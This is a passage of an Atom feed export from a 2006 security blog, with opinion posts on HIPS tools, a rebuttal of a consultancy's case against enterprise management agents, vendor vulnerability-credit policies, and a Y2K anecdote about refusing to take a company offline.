/&gt;&lt;br /&gt;First off, there's the obvious case of a patch.  You added something, and are now (hopefully) down one vulnerability, right?  Well, not exactly.  
Modern patches work by replacing an entire chunk of code with one just like it, (hopefully) minus the vulnerability.  It will, for example, replace an entire DLL.  So that's not more code, that's different code.  And sure, it might introduce more vulnerabilities too, but I'm trying to make a point here, work with me.&lt;br /&gt;&lt;br /&gt;So fair or not, I just removed the vendor from being able to go negative on vulnerabilities.  At least, not within the same software package.  Nothing that says Microsoft couldn't add something outside of Word to remove Word vulnerabilities, though.&lt;br /&gt;&lt;br /&gt;How about &lt;a href="http://isotf.org/zert/"&gt;third-party&lt;/a&gt; patches?  Well, depending on how they work, they might qualify for what I'm thinking.  If there is something that sticks around all the time, and is somehow removing a vulnerability from another piece of software on that system (and adds none of its own, of course), then maybe it just achieved negative vulnerability.&lt;br /&gt;&lt;br /&gt;Now, it's unlikely that a program of any size is not going to have its own vulnerabilities, so it had better fix a large number of someone else's.  This is what I think the HIPS category is trying to do.  If you look at &lt;a href="http://www.eeye.com/html/products/Blink/index.html"&gt;Blink&lt;/a&gt; or &lt;a href="http://www.determina.com/products/memory_firewall.asp"&gt;Determina&lt;/a&gt;, they dig around in the guts of someone else's software, and do things that try to remove vulnerabilities.  Or specifically, make them nonexploitable, downgrading them from vulnerabilities to just bugs.  For purposes of this discussion, let's call the process exiting instead of running shellcode "no longer vulnerable."&lt;br /&gt;&lt;br /&gt;Briefly, a sidebar: I'm quite annoyed by the current use of the term "HIPS".  
If you happen to be a &lt;a href="http://windowssecrets.com/"&gt;Windows Secrets&lt;/a&gt; paid subscriber, you may have seen my &lt;a href="http://windowssecrets.com/paid/061026/#perim0"&gt;article&lt;/a&gt; about that.  Briefly, there is a bunch of stuff calling itself HIPS, including traditional stuff like AV and file integrity checkers (read: Tripwire.)  Don't do that.  Otherwise, you don't leave me a good name for things like Blink, Determina, W^X, DEP, and those categories of protection.  Naming suggestions welcome.&lt;br /&gt;&lt;br /&gt;So let's assume these things work, at least partially.  If so, and they remove a substantial number of vulnerabilities (more than they add), then you have added software and removed vulnerabilities.  Discuss.&lt;br /&gt;&lt;br /&gt;(For those wondering if I have an ulterior motive on this one; not really.  BigFix doesn't do this kind of thing.  We might someday partner with a vendor that does, or add management of such products to our agent, but we don't muck about in the binaries of other software.  
I'm just interested in exploring the idea of adding software to remove vulnerabilities.)</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6309814738583655517/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6309814738583655517' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6309814738583655517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6309814738583655517'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/12/negative-vulnerabilities.html' title='Negative vulnerabilities?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7838251131610652167</id><published>2006-12-08T16:14:00.000-08:00</published><updated>2006-12-09T12:45:09.971-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><title type='text'>Nothing wrong with agents</title><content type='html'>This post is mostly in reaction to a &lt;a href="http://www.matasano.com/log/646/matasano-security-recommendation-001-avoid-agents/"&gt;post&lt;/a&gt; from Thomas Ptacek on the &lt;a href="http://www.matasano.com/log/"&gt;Matasano Blog&lt;/a&gt;, one of my favorites.  
Tom in turn says his was in reaction to a &lt;a href="http://www.stillsecureafteralltheseyears.com/ashimmy/2006/12/everyone_loves_.html"&gt;post&lt;/a&gt; from Alan Shimel, who is replying to an &lt;a href="http://www.comnews.com/stories/articles/1206web/1206forescout.htm"&gt;article&lt;/a&gt; by Ray Wizbowski.  That gives you some idea where in the food chain I am.  But it doesn't get interesting for me until Tom's post, so that's where I start.&lt;br /&gt;&lt;br /&gt;I'm not trying to feed any kind of Matasano/BigFix &lt;a href="http://techbuddha.wordpress.com/2006/12/06/responsible-vulnerability-disclosure/"&gt;war&lt;/a&gt; but hey, they &lt;a href="http://www.matasano.com/log/407/do-enterprise-management-systems-dream-of-electric-sheep/"&gt;started&lt;/a&gt; it.  (For the seriously humor impaired, I'm kidding.  I've known most of the Matasano guys casually for years, and Amrit has worked with Tom, and so on.  We're just disagreeing with each other using technical points, that's how it is supposed to work.)&lt;br /&gt;&lt;br /&gt;If you're just running across this post via some other blog, I'm the QA Manager at &lt;a href="http://bigfix.com/"&gt;BigFix&lt;/a&gt;.  We are a vendor of agent-based systems management software.  Though, I'm sure our lawyers would like me to point out that I'm providing my own opinions here, and I'm not a company spokesperson.  Anyway, probably because of where I work and what I know, I'm a fan of the agent-based approach, and naturally I think we do a fine job, our stuff is secure, and we can do it all.  So if you're thinking "Ryan is biased", well duh.&lt;br /&gt;&lt;br /&gt;Onto the bloggery.  
I make a few &lt;a href="http://www.matasano.com/log/646/matasano-security-recommendation-001-avoid-agents/"&gt;comments&lt;/a&gt; of little substance on Tom's blog entry, and he emails me to politely suggest that if I want to disagree, I should quit making snide jabs, and get to the point-by-point.&lt;br /&gt;&lt;br /&gt;Here's the premise I start from:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;You have a large number of machines (an "enterprise")&lt;/li&gt;&lt;li&gt;You wish to have mass control over them (you want "management")&lt;/li&gt;&lt;li&gt;The software that comes with the OS is insufficient for this purpose (you're going to buy some "software")&lt;/li&gt;&lt;/ul&gt;In other words, let's assume that the built-ins like WU, UP2DATE, YAST, ports, Software Update, and so on are not going to cut it.  Point being, you have decided you have to add something on, and not having extra software isn't an option.  If you disagree with this, then you probably have less than a few thousand machines, and the rest of this will be quite boring.&lt;br /&gt;&lt;br /&gt;Tom's assertion is that agent-based software is bad, m'kay? and you should avoid it.  To be completely fair, I'm seriously summarizing and putting words in his mouth.  But take a look at the title of his post I'm responding to, "Matasano Security Recommendation #001: Avoid Agents", and this &lt;a href="http://www.matasano.com/bh-agents/BH-AGENT-TALK_files/BH-AGENT-TALK.016.png"&gt;slide&lt;/a&gt; which says "Enterprise Management Applications - Threat or Menace?", and you sense a theme.  
Yes, Tom is quite fair in the details, and will tell you he can only make claims about stuff he has tried, which does not yet include BigFix.&lt;br /&gt;&lt;br /&gt;I understand good storytelling, yet I'm getting covered by these blanket statements.  So hopefully it is understandable if I feel it necessary to respond.&lt;br /&gt;&lt;br /&gt;So, you need some enterprise management software.  Your basic choices are agents, and scanners, because I've already ruled out any kind of one-by-one method as impractical by the time you get to a certain size.  I'm of the opinion that you can only get so far with pure scanners.  For example, they can only determine, they can't change.  If it can change, then what you have is a scanner-driven part-time agent.  Yes, they push an agent onto the box long enough to do their business, and then get off again.  And yes, there is value to only having the agent on there the absolute minimum amount of time, so I don't want to totally dismiss that benefit.&lt;br /&gt;&lt;br /&gt;Let's check Tom... OK, he's not advocating scanners.  In fact, if I'm not reading too much into it, he's not even saying you shouldn't run agents at all, he just wants fewer.  But wait, are we talking per machine, or what?&lt;br /&gt;&lt;blockquote&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Minimizing the number of machines that run agent software.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/blockquote&gt;Do you mean that some machines shouldn't run any agents?  Then how are you going to manage them?  Nothing wrong with hand-maintaining a small number of critical machines, of course, but I don't think that is what is being suggested.  So this might be basic choice number 1: Are you at more risk by not having management of your machines, or by having an agent, even if it is a "bad" one?  I still have to go with agent.  Simple math will get you there.  
Count all the various threats out there, and only a small handful of them have been aimed at agents.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;2. Minimizing the number of different agents supported in the enterprise as a whole.&lt;br /&gt;&lt;/blockquote&gt;I think this point is far more central to Tom's message.  And I don't disagree with him.  Again, no huge surprise, since BigFix replaces a number of other agents.  See next point.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;Endpoint agents&lt;/strong&gt; are programs that run silently in the background, usually as Windows Services or Unix daemons, which communicate back to a central management system. Well known examples include:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;&lt;p&gt;Systems Management (&lt;em&gt;BMC Patrol&lt;/em&gt;, &lt;em&gt;CA Unicenter&lt;/em&gt;, &lt;em&gt;Microsoft MOM&lt;/em&gt;)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Antivirus (&lt;em&gt;McAfee&lt;/em&gt;, &lt;em&gt;Symantec&lt;/em&gt;)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Patch Management (&lt;em&gt;Novell ZenWorks&lt;/em&gt;, &lt;em&gt;SDS&lt;/em&gt;, &lt;em&gt;BigFix&lt;/em&gt;)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Data Leakage Prevention &lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/blockquote&gt;Good definition, I agree.  But not on the categories, not for BigFix.  We do systems management, AV management (we manage something like 6 or more AV vendors' code and signature updates), AV &amp; antispyware engines (OEM'd), Patch, software distribution, power management, inventory, etc...  We do NOT do the HIDS functions ala Blink and Determina.  That would be an example of someone else's software we would manage.&lt;br /&gt;&lt;br /&gt;So it's incorrect to stick BigFix just in patch.  It's a common mistake, that's all we used to emphasize up until a few years ago.  And, hey, not Tom's job to make sure our marketing is properly conveyed.  
But I make a big deal out of it precisely because BigFix is exactly the kind of thing he's calling for to help reduce the number of agents running around.&lt;br /&gt;&lt;blockquote&gt;Agent-based architectures are a severe security risk.&lt;/blockquote&gt;So now Tom makes one of these leaps I object to.  He's drawing mass conclusions based on (significant) experience actually looking at a bunch of agent systems.  But you can't make a factual statement about all N software products by looking at N-M of them, if M is greater than zero.  You can only state generalities.&lt;br /&gt;&lt;br /&gt;He gives specific class examples.  While I still owe the world a BigFix architecture document (I know you're all anxiously waiting), let me give some short previews as responses.&lt;br /&gt;&lt;blockquote&gt;Listening Network Services on Agents&lt;/blockquote&gt;You can disable the BigFix notification protocol, and go full polling if you want.  We are client pull.  Even with the listener in the default listening state, the protocol is simple.  It's just a 12-16 byte (payload) UDP packet.  It suggests to the agent that there is something upstream that it should check for.&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;Listening Network Services on Management Servers&lt;/p&gt;&lt;/blockquote&gt;OK, got me there.  We've discovered that either the agent or the servers need to have something listening on the network, as a general design principle.  Are you suggesting that people go without management at all again?  I'm pretty sure any alternative to an agent will want a listener, too.&lt;br /&gt;&lt;blockquote&gt;Client of Agent Service on Management Server&lt;/blockquote&gt;That's our default, but it's not necessary if you don't want it.  We use the agent on the server to do software upgrade on the server.  But you can do it manually if you choose.  
I, for one, expect a software distribution system to be self-upgrading.  But here, you're implying that the server is security-critical.  I.e. crack the server, and you have the agents.  BigFix doesn't work that way.  All the security is in the signing keys.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Confidentiality and Integrity of Agent/Server Protocol&lt;/blockquote&gt;Ah, this is where we're especially awesome.  Everything the agent pulls down has been signed by the private key of an administrator, and is verified by the agent before it will save it or look at it.  We use OpenSSL and zlib libs, and of course track vulnerabilities in those, and re-release when they re-release.&lt;br /&gt;&lt;blockquote&gt;Web Application on Management Server&lt;br /&gt;&lt;/blockquote&gt;I'm suspicious that we're talking about different animals here, but we have an optional Web Reports component that can be run on the server or on its own server.  And it can do SSL if you like.  It will be there if you do an install taking all the defaults.  And again, getting the server for BigFix doesn't get you the agents.&lt;br /&gt;&lt;blockquote&gt;Javascript on Browser Client of Management Server&lt;br /&gt;&lt;/blockquote&gt;This is what makes me think we might be talking different animals.  We don't have a web-based management interface.  Or rather, to be completely up-front, we use the IE libs in our MFC app which is our Console, and everything is run in restricted zones or comes from signed content.&lt;br /&gt;&lt;blockquote&gt;Listening Network Services for Management Clients on     Management Server&lt;/blockquote&gt;Isn't this one a dupe?&lt;br /&gt;&lt;blockquote&gt;Middleware Frameworks and RPC&lt;br /&gt;&lt;/blockquote&gt;I think, from having listened to your Black Hat talk, this is referring to complicated protocols between the agents and server.  
We use a subset of HTTP, and move files around.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Client of Management Server Service on Agent&lt;/p&gt;&lt;/blockquote&gt;What?  Can't parse.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Display Logic for Agent-Sourced Data on Management Client&lt;/p&gt;&lt;/blockquote&gt;Ah, we could potentially suffer from this class of problem if we have bugs there.  You got one.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Confidentiality and Integrity of Client/Server Protocol&lt;/p&gt;&lt;/blockquote&gt;Isn't this a dupe?  If not, which Client and Server are we talking, if not the agent and server?  The management console?  Ours speaks the minimal HTTP and TDS (the MS SQL Server protocol.  (Well, the Sybase protocol, but now I'm just being pedantic because I used to work at Sybase.))&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Databases&lt;/p&gt;&lt;/blockquote&gt;Yep, got one of those.  You can't compromise our agents if you get the database.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Agents tend to be installed en-masse. Attacks that offer uniform compromise of all installed agents provide attacks with thousands of hijacked machines.&lt;/p&gt;&lt;/blockquote&gt;Yep.  True of any central management system, if you find a flaw that allows control of the endpoints.  How is this particularly the fault of agents?&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Even in the absence of an exploit that compromises agent software directly, it is impractical to ensure the security of thousands of endpoints. But every machine running an agent must be secured if the management components are to be shielded from attacks.&lt;/p&gt;&lt;/blockquote&gt;Ah, you assume that only agents can attack the server? Not so for BigFix.  Unless the customer has done some extra firewalling, anyone with IP connectivity can talk to the server.  
Attack away.&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In a majority of surveyed agent-based systems, compromise of  a single management server allows code execution on every  agent, exposing the enterprise to a single point of failure.&lt;/p&gt;&lt;/blockquote&gt;For our system, let's call this "stolen keys".  Yes, if you steal some keys (and the passphrase), you can act as the owner of those keys.  That's why we have key revocation.  We've got a whole PKI built-in, it works quite well.  Something can always be stolen, spoofed, or impersonated.  We went with what we felt has the best security, and has attestation to boot.  Our financials customers love the audit trail.&lt;br /&gt;&lt;br /&gt;This class of problem is true of any central management system.  Steal the important authentication thingy, and you control the endpoints.  Why is this particularly an agent problem?  Do you prefer some sort of scanner thing that gives the admin creds to every IP it hits?  Are you proposing no central management again?&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Agent implementations are often substantially homogenous, even across operating systems, enabling uniformly effective attacks against desktops, Windows servers, and Unix servers.&lt;/p&gt;&lt;/blockquote&gt;We prefer to think of it as uniform management, but guilty as charged.  So yes, if you steal some keys, we have a cross-platform language you can use to command the agents with.  Admittedly, for other central management systems, you would have to craft your commands in a number of different shells.&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Workstations of management operators are high-value IT     targets, and compromised agents can inject poisonous data to     exploit a myriad of clientside and XSS-style attacks to  hijack their machines.&lt;/p&gt;&lt;/blockquote&gt;This is a potentially viable technique if we have bugs in that area.  
But like I said, you needn't be an agent to attack there, go for it.  One of the points from your Black Hat talk was that apps that weren't Internet-facing didn't have to survive those attacks, and were weaker for it (my wording.)  So far, our customers with Internet-facing servers and relays where attackers could try feeding bogus data haven't fallen over.  Maybe we're just enjoying some obscurity.&lt;br /&gt;&lt;br /&gt;[Section on the kinds of things Matasano has found elsewhere.]&lt;br /&gt;&lt;br /&gt;No doubt about it, Matasano is good at what they do.  I'm looking to have more outside auditing Real Soon Now.  I have no illusions that we'll have a 100% flawless clean bill of health when we put it in front of someone of Tom's caliber.  What I AM confident about is that we will do far better than the others Tom talks about (but can't name, because they don't have their patches out yet.)&lt;br /&gt;&lt;br /&gt;First off, my programmers can beat up your programmers.  Second, our architecture is designed to eliminate huge swaths of problems.  That thing where we have everything that hits the agents be signed?  Right.  It means you can't throw attacks at the agents unless they are signed.  You have to find flaws in OpenSSL or zlib to try attacks before that stage.  While not perfect, we use those libraries for a reason.  Third, when something is found, we get our patches out in a timely manner.  The last big thing we had?  3 days.  And since our system does software distribution and patch management, you could be fully patched about 10 minutes after that, or as soon as your change management allows.&lt;br /&gt;&lt;br /&gt;[Tom's mitigating factors]&lt;br /&gt;If I did point-by-point here, a lot of it would be redundant.  
Hopefully, some summarizing will suffice.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;I fully disagree with removing the most important assets from management.&lt;/li&gt;&lt;li&gt;You don't need to segregate classes of managed machines if it's not important to "be an agent"&lt;/li&gt;&lt;li&gt;My protocols are as simple as can be.  They just move files around.  The files are all signed though, that's going to cause the attackers some trouble.&lt;/li&gt;&lt;li&gt;Suggesting "use SSL" alone is a boondoggle.  The key point, easy to miss, is Tom is suggesting that agents sign reports.  While that has value, and BigFix will likely offer that as an option in the future, it shouldn't be key to the system surviving.&lt;/li&gt;&lt;li&gt;Use third-party auditing?  Actually, I agree with you there, and I will be doing more.  But is that recommendation a huge surprise, given Tom's job? ;)&lt;/li&gt;&lt;/ul&gt;[Full-snark mode, Tom's conclusions]&lt;br /&gt;&lt;blockquote&gt;Agent-based architectures are incredibly convenient and can be a significant cost-saver for IT operations teams.&lt;br /&gt;&lt;/blockquote&gt;You forgot: And if you don't have one, or even some other central management system with the exact same class of problems, then you are in FAR, FAR worse shape than having a few agent holes to deal with.&lt;br /&gt;&lt;blockquote&gt;In all circumstances, enterprises should seek to minimize the number of agent installations within their enterprise.  &lt;/blockquote&gt;&lt;p&gt;Indeed.  And BigFix sales people are standing by.&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In all circumstances, enterprises should seek to minimize the number of different agent-based vendors their enterprises must support.&lt;/p&gt;  &lt;/blockquote&gt;&lt;p&gt;Still right with you there.&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;Agent-based software should be treated as a high-risk target for attacks. 
Agent software warrants intensive security testing and analysis and rigorous access control.&lt;/blockquote&gt;Treat us that way if you like, we won't hold it against you.  And then we will replace all the vendors who didn't hold up to scrutiny.  After all, Tom's talking about our competition.&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7838251131610652167/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7838251131610652167' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7838251131610652167'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7838251131610652167'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/12/nothing-wrong-with-agents.html' title='Nothing wrong with agents'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7910383639238070280</id><published>2006-11-30T01:33:00.000-08:00</published><updated>2006-11-30T02:11:41.985-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><title type='text'>Apple gives credit to evil haxors?</title><content type='html'>(OK, even I have to admit up front that I'm just giving Apple a kick in the joy 
department for the fun of it over this one.)&lt;br /&gt;&lt;br /&gt;So, I'm having a glance at &lt;a href="http://daringfireball.net/linked/2006/november#tue-28-su007"&gt;daringfireball.net&lt;/a&gt; this evening, to see what kind of Mac security zealotry I should be enraged about lately.  Gruber says they gave HD Moore &lt;a href="http://docs.info.apple.com/article.html?artnum=304829"&gt;credit&lt;/a&gt;.  Hey, look at that!  He's right.&lt;br /&gt;&lt;br /&gt;Now, you would think that with all the recent past history on Apple and vulnerability disclosure, Apple would have a policy of not crediting researchers who don't "properly" report vulnerabilities, wouldn't you?  After all, not even &lt;a href="http://www.microsoft.com/technet/security/bulletin/policy.mspx"&gt;Microsoft&lt;/a&gt; will give you credit if you don't play nice.  But for Apple, maybe that's not the case?  Here's what I believe is their &lt;a href="http://www.apple.com/support/security/"&gt;official policy&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. Apple usually distributes information about security issues in its products through this site and the mailing list below.&lt;/blockquote&gt;Near as I can tell, that's the entirety of their official written policy.  If there's a better version, I'd love a link.  Note that it doesn't say anything about giving credit or not.&lt;br /&gt;&lt;br /&gt;So maybe it's Apple's policy to give credit to the discoverer of the vuln, regardless of how it is disclosed?  If so, then kudos to Apple!  You've done one better than Microsoft.  Honestly, I don't see why you wouldn't.  
It's a simply acknowledgment of a fact.&lt;br /&gt;&lt;br /&gt;Now, if we could just get proper credit attached to an earlier wireless vuln, and work on not pretending a problem doesn't exist until "any necessary patches or releases are available", then I'd be that much happier.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-7910383639238070280?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7910383639238070280/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7910383639238070280' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7910383639238070280'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7910383639238070280'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/apple-gives-credit-to-evil-haxors.html' title='Apple gives credit to evil haxors?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-901045532185303715</id><published>2006-11-10T16:45:00.000-08:00</published><updated>2006-11-10T16:47:13.126-08:00</updated><title type='text'>MS says not exploitable</title><content type='html'>Hey, look at Microsoft &lt;a 
href="http://blogs.technet.com/msrc/archive/2006/11/10/follow-up-information-on-weblog-posting-about-poc-published-for-ms-office-2003-powerpoint.aspx"&gt;dropping&lt;/a&gt; the disassembly  to demonstrate that something isn't exploitable.  Nice.  I don't think I've seen them do that before.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-901045532185303715?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/901045532185303715/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=901045532185303715' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/901045532185303715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/901045532185303715'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/ms-says-not-exploitable.html' title='MS says not exploitable'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-270946131330187489</id><published>2006-11-06T20:59:00.000-08:00</published><updated>2006-11-06T21:37:20.234-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Shut down the Internet</title><content type='html'>A Sybase story this time.  
I was a network &amp; security guy at Sybase for just under 5 years, between 1995 and 2000.&lt;br /&gt;&lt;br /&gt;Speaking of 2000, I was at Sybase for the Y2K rollover.  Like most IT shops, we had spent a couple of years planning for Y2K, and as it got closer, we got busier.  Then I get a visit from the director of telecom.  He tells me that for the rollover weekend, we will be shutting down all Internet, dialup and ISDN links.&lt;br /&gt;&lt;br /&gt;What?!?&lt;br /&gt;&lt;br /&gt;Yes, his boss, one of the co-CIOs we had at the time, told him to cut off all outside communications because of hackers.  The request got dropped in my lap, because I was in charge of all the Internet links, firewalls, and dialup lines.&lt;br /&gt;&lt;br /&gt;What?!?&lt;br /&gt;&lt;br /&gt;It was explained to me that our CEO, John Chen, had been golfing with one of his buddies from HP, and he had heard through the grapevine that the hackers were going to be out in force on the Y2K weekend, and were saving their attacks for when companies were at their most vulnerable.  Therefore, we were going to preemptively take down our communications links, just like HP!&lt;br /&gt;&lt;br /&gt;(Remember the scandal about HP taking themselves off the net over the Y2K weekend, screwing their customers?  No, you don't.  It didn't happen.)&lt;br /&gt;&lt;br /&gt;I tried, briefly, to deal with my upstream management on the issue.  Nope, I was told it was a done deal.  This was several days before the rollover.&lt;br /&gt;&lt;br /&gt;I didn't wait long to go over everyone's heads and email the CEO explaining why he was making a mistake.  Reasons included things like "You're going to make SURE you have a major outage on the chance that you MIGHT have an attacker-driven outage." "I know a lot of these 'hackers'; they will either be working on Y2K at their day job, or drunk for New Year's." "What about all of our customers who need last-minute Y2K patches? 
What about all of our OWN people who need the same from other vendors?" "Do you have any idea what level of attack we already get and live through every day?  We get over a million failed connection attempts every day.  Literally!"&lt;br /&gt;&lt;br /&gt;And he started to relent.  I had a reasonable explanation for each of his concerns.&lt;br /&gt;&lt;br /&gt;The "deal" was that I would build a monitoring team, so that we had around-the-clock coverage of the firewalls and other logs, looking for anything suspicious.  I had to report in every so often.  Anything really bad, and we would have to pull the plug.&lt;br /&gt;&lt;br /&gt;Of course, nothing happened.  After about 12 hours, the CEO got really, really bored looking at attack reports.  Oh look, a port scan.  Oooh... a distributed port scan!  Hey, 100,000 attempts to connect to a telnet port that isn't listening.&lt;br /&gt;&lt;br /&gt;But I had had to make 8 network &amp; security people work the entire Y2K weekend, 8 hours on, 8 hours off, to be allowed to keep the links up.  These were 8 people who had done their jobs ahead of time, like they should have, and by all rights should have had a nice relaxing New Year's Eve for the big millennium switch.&lt;br /&gt;&lt;br /&gt;And Sybase was just going to screw their customers.  Not to mention making us as a company look like idiots.&lt;br /&gt;&lt;br /&gt;So, I got my way, forced Sybase to do the right thing, and had to suffer for it.  And naturally, I got the warning email afterward about "going through channels" (which would have got me exactly nowhere; I had had about 2 days).&lt;br /&gt;&lt;br /&gt;I left Sybase on January 31st to go work for SecurityFocus.  Sybase had made a corporate decision to essentially spam people, also over my objections.  (Did I mention that I was abuse@sybase.com?)  Plus, I was starting to get the kind of treatment that made it clear I was being punished for going over people's heads.  
This was just after I had tracked down a rogue sysadmin who was embezzling (a story for another time).&lt;br /&gt;&lt;br /&gt;Since then, I've taken jobs with people and companies that actually care about security.&lt;br /&gt;&lt;br /&gt;(No, don't lecture me about what year the millennium rolled over.  I have my own ideas about that.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-270946131330187489?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/270946131330187489/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=270946131330187489' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/270946131330187489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/270946131330187489'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/shut-down-internet.html' title='Shut down the Internet'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5948037449707334779</id><published>2006-11-04T18:28:00.000-08:00</published><updated>2006-11-04T19:01:05.724-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Crashing MailWorks</title><content type='html'>Another Bechtel story.&lt;br /&gt;&lt;br /&gt;Bechtel had standardized on DEC MailWorks for their corporate 
